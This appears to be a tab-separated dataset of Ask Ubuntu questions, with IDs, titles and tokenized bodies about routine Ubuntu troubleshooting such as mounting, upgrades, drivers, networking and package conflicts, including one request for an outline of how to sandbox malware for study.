288810	how come i ca n't resize google chrome 's window less than 595px ?	for some reason i can not resize chrome 's window to less than 595 px on ubuntu 12.10 . i can resize firefox 's window to 0 px . also i can resize the chrome window to a very small size on windows . this is an important issue when it comes to web design and more specifically responsive webdesign where resizing the window to at least 320px plays an important role . does anyone know why this is happening and how to fix it ?
288813	network connection does n't work on ubuntu 12.04 lts running on vmware	after installing wpa_supplicant , the network connection on my guest ubuntu 12.04 lts amd64 running on vmware v9 with win7x64 as host os , started to fail to start up . and i do n't have any connection to the internet . i tried to uninstall and re-install the network manager , but it still does n't work so any suggestion about how to solve this problem ? thanks a lot .
288819	usb memory devices not working ( unable to mount )	i have an annoying problem . on my laptop all of my usb memory devices stopped working . they all worked fine until few days ago , i do n't remember doing anything to affect it myself . until that day i used ubuntu 12.04 . i thought maybe i could fix the problem by upgrading ubuntu , so i upgraded to ubuntu 12.10 , but the problem was still there , and i finally upgraded to ubuntu 13.04 , but it did n't fix the problem . when i insert a usb memory stick , this is the message i get : unable to mount volume ( name of the device ) . device /dev/sdb1 is already mounted at `/media/usb0 ' . my phone and mouse work fine . i can see what 's on the usb stick , but i ca n't delete it or write or paste anything new since the only available options are copy , eject and properties . i 'm so bad with the terminal , usually when i have some problem i just reinstall the os , but i ca n't do it now since i have some personal files that i do n't want to lose .
288820	ubuntu 13.04 wont start [ sdb ] asking for cache data failed	i installed ubuntu 13.04 yesterday on my acer aspire 5742 and it all worked ok , i go to turn it on today , and just as it loads the log in screen a black screen that says [ 58.620634 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 58.620708 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through i am unable to do anything with this up apart from turn the laptop off , it just repeats the message with different numbers at the start this also occurred once whilst i was using google chrome , do not remember what i was doing at the time i am completely new to linux and ubuntu and have no idea what this means my laptop has intel i3 4gb ram 128 gb kingston hyperx ssd running ubuntu 13.04 amd64 edit : i had an empty sd card in the sd card reader , removed this and it seems to have stopped it , no idea if this is permanent or luck , can somebody please tell me why this happens ?
288821	how do i resolve a `` can not open shared object file libudev.so.0 '' error ?	trying to run game dev tycoon on ubuntu 64 . it asks for the above object . i ran sudo apt-get install libudev1 : i386 and it came back already installed . i have /lib/i386-linux-gnu/libudev.so.1 but no libudev.so.0 anywhere .
288823	very strange gui problem	i 'm having a very strange problem in ubuntu 13.04 : i can only boot into the cairo-dock session and as you can see , some of the screen is missing . another issue is that the window borders ( with the close , minimize , maximize ) is missing . it only did this once before during the upgrade , but worked on the next boot . i did n't install any packages my last session , only an hour or two of vms . so now i am stuck with winows 8 : ( . any help would be greatly appreciated !
288826	install ubuntu to boot from partition on external hard drive	how might i partition my hard drive so that i can boot ubuntu from one partition and file storage in another . i am running mac osx mountain lion . i want to boot from my external hard drive into ubuntu on a mac computer . my external hard drive is dual usb connected .
288827	wireless internet dropping intermittently on ubuntu 12.10	this did n't happen on ubuntu 12.04 , but now i ca n't seem to be connected to the internet for more than 10 minutes continuously on ubuntu 12.10 . it drops every 1-10 minutes . it is really starting to piss me off ( bad internet is my road rage ) . i 've tried everything else i 've seen on various forums and nothing is working . let me know if you need any data from me and i 'll try to get it for you . whoever helps me solve this will be my hero !
288832	ubuntu 13.04 install says there is `` not enough space ''	`` not enough space '' ? i have plenty of space ! what space is it talking about ? how can i fix it ? not too much additional info to give : for starters , my /boot area is 243 mib according to gparted . i clicked the upgrade button on the update window it proceeded to download some workfiles it started the upgrade process showed a dialog with a list of things it was going to do ( upgrading ubuntu to version 13.04 ) step 1 was finished ok ( preparing to upgrade ) step 2 almost finished ( setting new software channels ) then it crashed at sub-step `` calculating the changes '' error text : not enough free disk space the upgrade has aborted . the upgrade needs a total of 26.0 m free space on disk '/boot ' . please free at least an additional 5,029 k of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' .
288834	does ubuntu support cdma/lte on the sprint galaxy nexus	i 'm looking to switch from android os to ubuntu on my sprint samsung galaxy nexus . i was wondering if ubuntu supports cdma and lte .
288835	virtualbox 4.2.12 installation breaks ubuntu 13.04 desktop	i recently installed ubuntu 13.04 on my pc , and then got to downloading virtualbox 4.2.12 from the official link . after installing virtualbox 4.2.12 , when i reboot my pc , the desktop is gone , as i described in this question . i found a fix to that problem , by typing in tty1 sudo apt-get install ubuntu-desktop , but this involves uninstalling the virtualbox . the issue is fully reproductible , so i can provide you with any details you might wish for . my computer is a samsung series 3 . it runs only this version of ubuntu , has no other partitions or os 's . thanks ahead .
288836	ubuntu 13.04 - shutdown hang at purple ubuntu loading screen	just updated from 12.10 . ubuntu can not shutdown properly , it hangs at the purple ubuntu loading screen with dots animation still moving . it hanged about half an hour . i hold the power button to shut it down . i happened on every boot . please help . this is all that i know . 1/5/2013 - 6:59 i tried sudo service lightdm restart code , and returns in console ( black screen ) : asking for cache data failed assuming drive cache : write through then after a half screen of attempts , the screen black out ( screen saving ) . i pressed the power button and another shutdown procedure began . images : http : //imageshack.us/photo/my-images/163/sany0427q.jpg/ http : //imageshack.us/photo/my-images/10/sany0428r.jpg/
288837	ubuntu 12.04 & uefi mode	on a new dell xps 8500 , i tried to install a fresh xubuntu 12.04.2 with efi enabled but it did not work : the 'grub-efi-amd64-signed ' package failed to install in /target/ as specified in https : //help.ubuntu.com/community/uefi , i disabled efi boot and installation went fine ( but it seems slower than with efi ) . now that ubunut is running fine , should i turn efi boot on again or it wo n't change anything ?
288839	how can i open these .docx files from chrome more quickly ?	this is a very specific question . i 'm a lawyer from chile , the thing is we use a webpage to check on the state of our judiciary cases . the problem when i started using ubuntu ( and chromium ) is that when i clicked a word document in the web-portal it did n't give me the option is viewing it in the browser . moreover , it gave me the option of downloading it , but the extension of the file instead of being .docx was .do by default ( and the file name is always downloadfile.do ) . it took me a while to figure out that if i added the .docx to .do i could download and open the word document ( which is a lot of trouble considering the number of files i need to check constantly and not save in my pc ) . pdf documents could downloaded correctly , but no opened in the browser . i thought that using chrome instead of chromium would fix the problem , but it only helped with the pdf files , not the .docx ones . if you wish to try the website and check the problem , either go directly to this page or browse from http : //civil.poderjudicial.cl/ by entering `` rol interno : c-18271-2011 '' and `` tribunal de origen : 4째 juzgado civil de san miguel '' ( at the bottom ) and then clicking `` consulta '' . do n't worry , this information is public and i 'm only using it as an example so you can help me with the .do files .
288842	`` general error mounting filesystems '' after upgrade to 13.04	i just tried updating to 13.04 from 12.10 . when i restarted , it went to grub even though there 's no other os on the computer . i clicked on ubuntu to finish booting and i got a terminal with the error message : general error mounting filesystems . a maintenance shell will now be started . control-d will terminate this shell and reboot the system . root @ mycomputer : ~ # reboot brings me back to the exact same place . the only other options on grub are advanced options for ubuntu and a couple of memory test options . i ran one of them and it came out fine . i have no idea what to do next . please advise . edit : per request , here is the contents of /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # /was on /dev/sda1 during installation uuid=5b22f712-cd92-446e-8984-0c31ca17c02c / ext4 errors=remount -ro 0 1 # swap was on /dev/sda5 during installation uuid=86ea10b7-9309-4860-8ade-059f9d9fa328 none swap sw 0 0
288844	automatically load cdc-acm at boot	hi i am trying to figure out how i can load the cdc-acm module at boot . i tried this command : sudo bash -c echo hoi > > /etc/modules but i get this : bash : /etc/modules : permission denied please help !
288846	free 2d cad for ubuntu	okay i 've looked , and i 've looked but for the life of me i ca n't find a free 2d cad program that is compatible for ubuntu . i need it to be free but allow me to type in exact measurements for the sides and angles . also i ca n't work with something that has a layer limit because i 'm designing a forty floor building . please need one a.s.a.p . thanks , shockwave
288850	how can i install vagrant on 12.04 if ruby-json is already installed ?	i tried to install the software , which are in software center and new software like virtual box , but it is showing the error : items can not be installed or removed until the package catalog is repaired , do you want to repair it ? when i clicked the repair icon , it is showing : package operation failed , installation or removal of a software package failed installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = '' en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = '' en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = '' en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 195378 files and directories currently installed . ) unpacking ruby-json-pure ( from ... /ruby-json-pure_1.5.1-0ubuntu3_all.deb ) ... dpkg : error processing /var/cache/apt/archives/ruby-json-pure_1.5.1-0ubuntu3_all.deb ( -- unpack ) : trying to overwrite '/usr/lib/ruby/vendor_ruby/json.rb ' , which is also in package ruby-json 1.6.3-1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/ruby-json-pure_1.5.1-0ubuntu3_all.deb error in function : dpkg : dependency problems prevent configuration of ruby-vmc : ruby-vmc depends on ruby-json-pure ( > = 1.5.1 ) ; however : package ruby-json-pure is not installed . dpkg : error processing ruby-vmc ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cloudfoundry-client : cloudfoundry-client depends on ruby-vmc ( = 0.3.10-0ubuntu10 ) ; however : package ruby-vmc is not configured yet . dpkg : error processing cloudfoundry-client ( -- configure ) : dependency problems - leaving unconfigured how can fix this problem ?
288853	why is gpg getting upset and how do i stop it ?	i recently migrated from one installation of ubuntu to another , and in the process changed my username . i imported my public/private key pair into gpg , and while decryption ( using my private key ) works fine , whenever i attempt to encrypt something to myself with my public key i get the following warning message : it is not certain that the key belongs to the person named in the user id . if you *really* know what you are doing , you may answer the next question with yes . after that it asks me whether i really want to use the key ( i always answer `` yes '' , because it is in fact the only key in my keyring and i know where it came from ) . i can decrypt stuff just fine , so why does gpg throw a hissy fit whenever i try to encrypt something ? and how can i prevent this message from appearing again ?
288857	where does unity-webapps gets installed ?	when reddit.com asked if i want to install reddit unity webapp , on clicking ok it got installed directly wihtout asking for my password . does that mean it 's installed in user 's directory ? if no , then why it did n't ask for my password ?
288864	redirect traffic from 2 ubuntu external nics to specific internal hosts	i am having problems redirecting incoming traffic to 2 external facing interfaces on my ubuntu 12.10 server to 2 separate internal hosts . i am able to redirect incoming traffic on my eth0 just fine to the internal host but the incoming traffic to my eth1 interface never goes anywhere . any suggestions ? here are the iptables and interfaces settings i am using . /etc/iptables.rules -a prerouting -i eth0 -p tcp -m tcp -- dport 8000 -j dnat -- to-destination 10.101.0.20:3389 -a prerouting -i eth1 -p tcp -m tcp -- dport 3389 -j dnat -- to-destination 10.101.0.79:3389 -a postrouting -o eth0 -j snat -- to-source 63.22.130.186 -a postrouting -o eth1 -j snat -- to-source 63.22.130.187 /etc/network/interfaces # eth0 auto eth0 allow-hotplug eth0 iface eth0 inet static address 63.22.130.186 netmask 255.255.255.248 gateway 63.22.130.185 dns-nameservers 8.8.8.8 pre-up iptables-restore < /etc/iptables.rules # eth1 auto eth1 allow-hotplug eth1 iface eth1 inet static address 63.22.130.187 netmask 255.255.255.248 dns-nameservers 8.8.8.8 # eth2 auto eth2 allow-hotplug eth2 iface eth2 inet static address 10.101.0.1 netmask 255.255.0.0 dns-nameservers 8.8.8.8
288867	unable to mount exit code 12	i 'm trying to recover data from an internal hdd with no os running ubuntu 12.04 from an usb drive . with fdisk-l i get this : device boot start end blocks id system /dev/sda1 63 976771119 488385528+ 42 sfs i do n't know what to do , thanks for helping this poor noob
288869	how to correct my kernel version ?	my question is how can i reverse back to a kernel version . i have installed the brand new kernel version , that is 'ubuntu , with linux 3.4.0-30400 , i did the correct procedure . how to upgrade kernel version ? . but when my machine booted with the new kernel , by the grub boot screen as i clicked , it does not load the operating system . it get 's stuck at the boot process . after this event i went to a previous version , that was the default , 'ubuntu , with linux 3.2.0-39-generic kernel . ' it works correctly . how can i get this working kernel to boot up in the first place kernel , and change the default kernel , to one that works . if you can please explain/instructions , i would appreciate it . thank you pictures
288871	infinite loop on login 12.04	my machine used to automatically log me in . it crashed a couple of weeks ago and now it boots to the login screen . when i type in the password , the screen goes black for a couple of seconds and returns to the login screen . over and over ! if i type in an incorrect password , a red error message appears , so i reckon my password is ok . it will let me log in as a guest ( no password ) , but of course i ca n't access my folders or files as a guest . ctrl+alt+f1 sends it into sleep mode !
288875	how to install 13.04 on alienware x51 ?	dell released x51 with ubuntu 13.04 preinstaled . i was wondering if i can install it myself ? i have a 2012 x51 ( i7 2600 , nvidia 550 ) and after trying to install 13.04 i could n't get it to boot up although the installatioon went fine . any ideas ? i tryed to install from usb drive following the tutorial for 12.04 installation .
288876	how do i script juju deployment ?	i have been working on a few juju charms and am ready to start testing a deployment of our services . is there a standard method for deploying an environment ? for instance , do i have to manually type , juju deploy charm xxx from the command line ? can i build a charm that deployes and configures other charms ? thanks
288881	is my harddisk fully formated during ubuntu installation ?	last night i installed ubuntu on my laptop which earlier had windows 7 . for installation i made one 26gb partition free and install ubuntu on it.during installation i choose `` something else '' optin and select the drive which i earlier free . but after completion of installation i didnt see option to choose between win7 and ubuntu , it directly take me to ubuntu desktop and also i cant see my other windows partition in there . what should i do now to get those partition and since it is not detecting my micromax net connector am not able to connect to the internet..
288885	hdmi support and nvidia optimus systems	i see a few questions and talks of a new nvidia driver that allegedly supports optimus technology , by nvidia . i use a dell vostro 3500 core i5 4gb ram , with an intel video card and a geforce 310m gs . the systems : ubuntu 13.04 / win 7 ( dual-boot ) . my question concerns hdmi support with a video card similar to the one i have . even with bumblebee installed , when i had ubuntu 12.10 running , i could n't switch to hdmi external monitors . that 's the only reason why i still use dual-boot . i would be happy even if it 's possible to make hdmi working only with the intel card . has anyone ever tried the new 319.12 driver by nvidia on ubuntu and saw any significant difference , specially concerning hdmi support ? has anyone ever succeeded in connecting hdmi external monitors using nvidia drivers , with or without bumblebee ? thanks in advance for sharing your sollutions .
288886	recently used files in gnome shell	without any additional extensions , in activities overview search , i do not get to see any recently used files . i am using gnome 3.6 that ships with ubuntu 13.04 . is this a feature ( or lack of it ) or a bug ?
288893	repeated uploads of a file that does n't change	i have a pdf file on my desktop ( which is connected to u1 ) . it is an article i want look at someday later . almost every day -- even though i have n't touched this file -- the u1 banner pops up and says that u1 is uploading this file ( and usually several others ) . why does this fie , and no other unchanged files , keep repeatedly uploading ?
288895	why does n't brother hl 2130 printer work on ubuntu 13.04 ?	i 'm facing problems with brother hl 2130 printer on ubuntu 13.04 . it does n't print anything and all the loaded papers flow away at the same time from the box . how do i resolve this ?
288900	updating problems ubuntu 12.10	whenever i try to update my computer by opening the update manager i get this problem and it just closes . can someone help me ? w : gpg error : http : /packages.medibuntu.org quantal inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 2ebc26b60c5a2783 , w : failed to fetch http : /ppa.launchpad.net/ferramroberto/gsharkdown/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ferramroberto/gsharkdown/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
288905	ubuntu does n't detect windows 7 partition	i am trying to install ubuntu 12.04 on my windows 7 machine . i have set aside another partition in my only hard drive ( 1tb ) . when i put in my cd , the installer does not detect my windows 7 partition , as it should , and the only option given to me is to wipe everything , which i do not want . i ran the boot repair tool and this is the url it spit out . http : //paste.ubuntu.com/5621531/ any help is appreciated . thank you .
288906	cant ' install from usb	i have tried to reinstall ubuntu after forgetting my admin password . i have downloaded ubuntu , but it comes up with missing operating system when i connect the usb . i have downloaded and unpacked the operating system onto . what am i doing wrong ? i managed to go into shell and try and change the password thier . it says it was successful but when trying to download something it says the password is wrong . this is the reason i would like to reinstall ubuntu .
288910	how can i enable adobe flash player to use local cache	as the title says : using ubuntu 12.04lts , how can i enable adobe flash player to use local cache ?
288912	remmina does not share folders or disks ?	i have ubuntu 12.04 . i use remmina to connect with remote windows xp . i have configured remmina for sharing my user folder , but i can not see the folder in my remote windows desktop . any idea ?
288913	connecting to wrong ip	sudo apt-get update when i try this command on terminal it says : 0 % [ connecting to 107.108.85.10 ( 107.108.85.10 ) ] [ connecting to 107.108.85.10 ( 1 which i 'm not sure is which ip ... it 's definitely not my ip address . how to resolve this ?
288915	ati drivers prevent ubuntu from booting on other computers with other graphics cards	i have ubuntu 13.04 raring ringtail ( final release ) installed on an usb 3.0 external hard drive . the goal is to be able to use it on any computer with a usb 3.0 port . i have successfuly installed the ati 13.4 graphics driver on it - this is for my desktop which has a radeon hd 7950 graphics card . i also would like to use this ubuntu on my mac , with intel hd 4000 integrated graphics . ubuntu works on my desktop with the ati drivers as it has the ati graphics card , however gave me a `` low graphics mode '' warning ; i selected the option `` reset graphics '' and restarted . ubuntu starts ( the login screen is normal ) but unity no longer stats and so i have no windows border , no sidebar or top menu . i can right click and it show menus and i can open the terminal with the hotkey for it , but nothing else . keep in mind : ubuntu still works on the desktop with the ati graphics card , however it does not on my mac which had intel hd 4000 integrated graphics . before it worked on both , but because of the lack of proprietary drivers , there was serious lag on the desktop . thank you for any help on how to get unity to start on the mac !
288916	isolate malware in virtualbox and emulate fake responses	i have some malware i want to study , intercepting its `` phone home '' connections , sniffing where and how it is trying to connect and then somehow , by pretending i am the host ( s ) he is connecting to , answer back and thus try to learn its `` protocol '' . i assume virtualbox will be part of the solution . but i also noticed that i will need special precautions so my lan does not get exposed . so my question is : how to configure virtualbox guest so it can not , by any means , access my pc ( the host ) files , or my lan ? from my previous question , i think i need to disable networking in guest . but then ... how can i ( either at host or guest ) sniff all connections he is trying to make ? hostnames , ips , ports , content , etc ? installing wireshark ? where , in host or guest ? how ? once i know the ips/hostnames , how can i ( again , at either guest or host ) pretend to the malware that i am such hostname and reply its connections , communicating with it ? installing apache and using cgi/php scripts etc ? where and how ? i know this is a complex question , so to simplify : what really i need is the outline of a solution , a strategy that satisfy the goals . the list of tools , how they fit , and a general description of how it would work . something like , example : `` set virtualbox network to xxx mode , install wireshark on guest to sniff , edit /etc/yyyy so all conections are redirected to daemon zzz which will in turn invoke your scripts so you can reply to the malware '' useful info : host is ubuntu 12.04 malware is a java jar , so guest can be anything most connections are plain http/https requests ( but there may have more i 'm unknown of )
288918	compiling a dll project written in c++	i am new to linux , but i have tried ubuntu for basic stuff and i really like it . i want to explore the possibility to switch from windows . however , at the moment i am working with microsoft visual studio to develop a dll written in c++ . the dll is to be used together with a software in windows ( there is no linux counterpart ) . is there an easy way to do this from ubuntu ? if so , how ? some people have mentioned mingw cross-compiler , but i want to know if this is the best option or if there are more options out there . thanks
288920	problems on boot	good morning ! i have a little problem with my ubuntu 13.04 . actually , i have this problem with any other linux distributive ( fedora , fuduntu , mandriva , ubuntu 11.04 = > 13.04 , linux mint 14 and oth. ) . heres what happened : when the computer is start , i have a little blink on the display . it seems like some process crashed . everything works fine after that , but i am afraid of my notebook . notebook : thinkpad x220 42990 rv5 here`s log : tablet kernel : [ 12.294342 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready may 1 11:03:49 tablet kernel : [ 12.539310 ] microcode : cpu0 sig=0x206a7 , pf=0x10 , revision=0x28 may 1 11:03:49 tablet kernel : [ 12.543377 ] lp : driver loaded but no devices found may 1 11:03:49 tablet kernel : [ 12.564252 ] [ drm ] initialized drm 1.1.0 20060810 may 1 11:03:49 tablet kernel : [ 12.566920 ] mei 0000:00:16.0 : setting latency timer to 64 may 1 11:03:49 tablet kernel : [ 12.566983 ] mei 0000:00:16.0 : irq 44 for msi/msi-x may 1 11:03:49 tablet kernel : [ 12.567186 ] cfg80211 : calling crda to update world regulatory domain may 1 11:03:49 tablet kernel : [ 12.578325 ] wmi : mapper loaded may 1 11:03:49 tablet kernel : [ 12.579449 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \_sb_.pci0.lpc_.pmio 1 ( 20121018/utaddress-251 ) may 1 11:03:49 tablet kernel : [ 12.579456 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 1 11:03:49 tablet kernel : [ 12.579462 ] acpi warning : 0x0000000000000540-0x000000000000054f systemio conflicts with region \_sb_.pci0.lpc_.lpio 1 ( 20121018/utaddress-251 ) may 1 11:03:49 tablet kernel : [ 12.579465 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 1 11:03:49 tablet kernel : [ 12.579489 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \_sb_.pci0.lpc_.lpio 1 ( 20121018/utaddress-251 ) may 1 11:03:49 tablet kernel : [ 12.579493 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 1 11:03:49 tablet kernel : [ 12.579494 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \_sb_.pci0.lpc_.lpio 1 ( 20121018/utaddress-251 ) may 1 11:03:49 tablet kernel : [ 12.579497 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver may 1 11:03:49 tablet kernel : [ 12.579498 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich may 1 11:03:49 tablet kernel : [ 12.584168 ] [ drm ] memory usable by graphics device = 2048m may 1 11:03:49 tablet kernel : [ 12.584175 ] checking generic ( e0000000 130000 ) vs hw ( e0000000 10000000 ) may 1 11:03:49 tablet kernel : [ 12.584177 ] fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver may 1 11:03:49 tablet kernel : [ 12.584216 ] console : switching to colour dummy device 80x25 may 1 11:03:49 tablet kernel : [ 12.584306 ] i915 0000:00:02.0 : setting latency timer to 64
288930	serious lag problem with ubuntu 13.04	i had 12.04 with no problems at all , but when i updated to 13.04 it takes like 5 seconds to minimize a program ! i would been very helpful with an soulution .
288931	why does `apt-get install python-` remove everything ?	have a look at the output of this simulated apt-get : $ apt-get -s install python- note : this is only a simulation ! apt-get needs root privileges for real execution . keep also in mind that locking is deactivated , so do n't depend on the relevance to the real current situation ! reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gcj-4.6-base libc-ares-dev libev-dev libev4 libgc1c3 libgconf2-doc libgio-cil libgsl0ldbl libjs-node-uuid libjs-underscore liblapack3 libmagick++5 libmlt++3 libmlt-data libmlt5 libportmidi0 libpython-all-dev libpython-dev libsexy2 libsmpeg0 libsox-fmt-alsa libsox-fmt-base libsox2 libtorrent-rasterbar7 libv8-3.8.9.20 libv8-dev melt node-abbrev node-block-stream node-fstream node-graceful-fs node-inherits node-ini node-lru-cache node-minimatch node-mkdirp node-node-uuid node-nopt node-request node-rimraf node-semver node-tar node-which nodejs python-matplotlib-data python3-dirspec recordmydesktop ubuntuone-client-data use 'apt-get autoremove ' to remove them . the following packages will be removed apt-xapian-index bzr bzr-dbus bzrtools clang clang-3.2 compiler-rt covergloobus cython deluge deluge-common deluge-console deluge-gtk deluged dput duplicity fail2ban gcj-4.6-jre-lib gconf-editor gconf2 gimp gimp-ufraw git-cola gksu gstreamer0.10-gconf gtk-recordmydesktop hugin hugin-data hugin-tools inkscape ipython jockey-common jockey-kde kde-config-touchpad kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-settings-desktop kubuntu-settings-netbook landscape-client-ui-install libbonoboui2-0 libgcj-common libgcj12 libgconf2-dev libgksu2-0 libglade2-dev libgnome-media-profiles-3.0-0 libgnome2-0 libgnome2-bin libgnome2-common libgnomeui-0 libgnomevfs2-0 libgnomevfs2-common libgnomevfs2-extra libpurple-bin meld muon muon-installer muon-notifier nmap nodejs-dev npm nvidia-settings-313 openshot openstv pastebinit pdftk picard plasma-scriptengine-python plasma-widget-facebook playonlinux printer-driver-sag-gdi pylint python python-all python-all-dev python-appindicator python-apport python-apt python-aptdaemon python-aptdaemon-gtk python-aptdaemon.gtk3widgets python-aptdaemon.gtkwidgets python-boto python-bzrlib python-cairo python-central python-chardet python-configglue python-configobj python-crypto python-cups python-cupshelpers python-dateutil python-dbus python-debian python-debtagshw python-decorator python-defer python-dev python-dirspec python-distutils-extra python-django python-egenix-mxdatetime python-egenix-mxtools python-enchant python-fixtures python-gamin python-gconf python-gdbm python-gi python-gi-cairo python-glade2 python-gnome2 python-gnomekeyring python-gnupginterface python-gobject python-gobject-2 python-gobject-2-dev python-gpgme python-gst0.10 python-gtk2 python-gtk2-doc python-gtksourceview2 python-httplib2 python-ibus python-imaging python-imaging-compat python-indicate python-jsonrpc2 python-kde4 python-keybinder python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libproxy python-libtorrent python-libxml2 python-logilab-astng python-logilab-common python-lxml python-matplotlib python-memcache python-mlt5 python-mutagen python-nose python-notify python-numpy python-oauth python-oauthlib python-opengl python-openssl python-pam python-paramiko python-pexpect python-pip python-piston-mini-client python-pkg-resources python-problem-report python-protobuf python-pyatspi python-pyatspi2 python-pyaudio python-pycurl python-pygame python-pygoocanvas python-pyinotify python-pyorbit python-pyparsing python-pyrex python-pytools python-pyudev python-qt4 python-qt4-dbus python-quickly-common python-quickly-core python-quickly.widgets python-renderpm python-reportlab python-reportlab-accel python-requests python-serial python-setuptools python-simplegeneric python-simplejson python-sip python-six python-smbc python-software-properties python-support python-telepathy python-testtools python-tk python-twisted-bin python-twisted-core python-twisted-names python-twisted-web python-tz python-ubuntuone-client python-ubuntuone-storageprotocol python-uniconvertor python-uno python-urllib3 python-virtkey python-vte python-wadllib python-webkit python-wimpiggy python-wnck python-wxgtk2.8 python-wxversion python-xapian python-xdg python-xkit python-xlib python-yaml python-zeitgeist python-zope.interface quickly quickly-widgets rastertosag-gdi screen-resolution-extra ssh-import-id steam : i386 steam-launcher stgit sublime-text sublime-text-2-beta system-config-printer-common system-config-printer-udev terminator ttf-mscorefonts-installer ubuntu-system-service ubuntuone-couch ufraw update-notifier-common userconfig xchat xchat-common xchat-indicator xpra zeitgeist zeitgeist-core zeitgeist-datahub 0 upgraded , 0 newly installed , 244 to remove and 0 not upgraded . remv kubuntu-firefox-installer [ 13.04ubuntu2 ] remv muon-installer [ 2.0.0-0ubuntu3.1 ] remv muon [ 2.0.0-0ubuntu3.1 ] remv apt-xapian-index [ 0.45ubuntu2 ] remv bzr-dbus [ 0.1~bzr53-0buntu1 ] remv bzrtools [ 2.5+bzr786-2ubuntu1 ] remv bzr [ 2.6.0~bzr6571-4ubuntu2 ] remv clang [ 3.2-1~exp9ubuntu1 ] remv clang-3.2 [ 3.2-1~exp9ubuntu1 ] remv compiler-rt [ 3.2-1~exp9ubuntu1 ] remv covergloobus [ 1.7-0~361~precise1 ] remv cython [ 0.17.4-0ubuntu1 ] remv deluge [ 1.3.6-0ubuntu2 ] remv deluged [ 1.3.6-0ubuntu2 ] remv deluge-gtk [ 1.3.6-0ubuntu2 ] remv deluge-console [ 1.3.6-0ubuntu2 ] remv deluge-common [ 1.3.6-0ubuntu2 ] remv dput [ 0.9.6.3+nmu1ubuntu1 ] remv duplicity [ 0.6.21-0ubuntu1 ] remv fail2ban [ 0.8.7.1-1 ] remv gcj-4.6-jre-lib [ 4.6.4-1ubuntu1 ] remv gconf-editor [ 3.0.1-1ubuntu2 ] remv xchat-indicator [ 0.3.11-0ubuntu4 ] remv xchat [ 2.8.8-7ubuntu2 ] remv xchat-common [ 2.8.8-7ubuntu2 ] remv ufraw [ 0.19.2-0ubuntu1 ] remv terminator [ 0.96-2fakesync1 ] remv libgnome-media-profiles-3.0-0 [ 3.0.0-1ubuntu1 ] remv libgnomevfs2-extra [ 1:2.24.4-1ubuntu5 ] remv python-gnome2 [ 2.28.1+dfsg-1build1 ] remv libgnomeui-0 [ 2.24.5-2ubuntu3 ] remv libbonoboui2-0 [ 2.24.5-0ubuntu2 ] remv libgnome2-0 [ 2.32.1-2ubuntu4 ] [ libgnome2-bin : amd64 ] remv libgnome2-bin [ 2.32.1-2ubuntu4 ] remv inkscape [ 0.48.4-0.1ubuntu2 ] remv libgnomevfs2-0 [ 1:2.24.4-1ubuntu5 ] remv libgnomevfs2-common [ 1:2.24.4-1ubuntu5 ] remv libgnome2-common [ 2.32.1-2ubuntu4 ] remv gksu [ 2.0.2-6ubuntu2 ] remv libgksu2-0 [ 2.0.13~pre1-6ubuntu2 ] remv libgconf2-dev [ 3.2.6-0ubuntu1 ] remv gstreamer0.10-gconf [ 0.10.31-3+nmu1ubuntu2 ] remv gconf2 [ 3.2.6-0ubuntu1 ] remv gimp-ufraw [ 0.19.2-0ubuntu1 ] remv gimp [ 2.8.4-1ubuntu1 ] remv git-cola [ 1.8.1-1 ] remv gtk-recordmydesktop [ 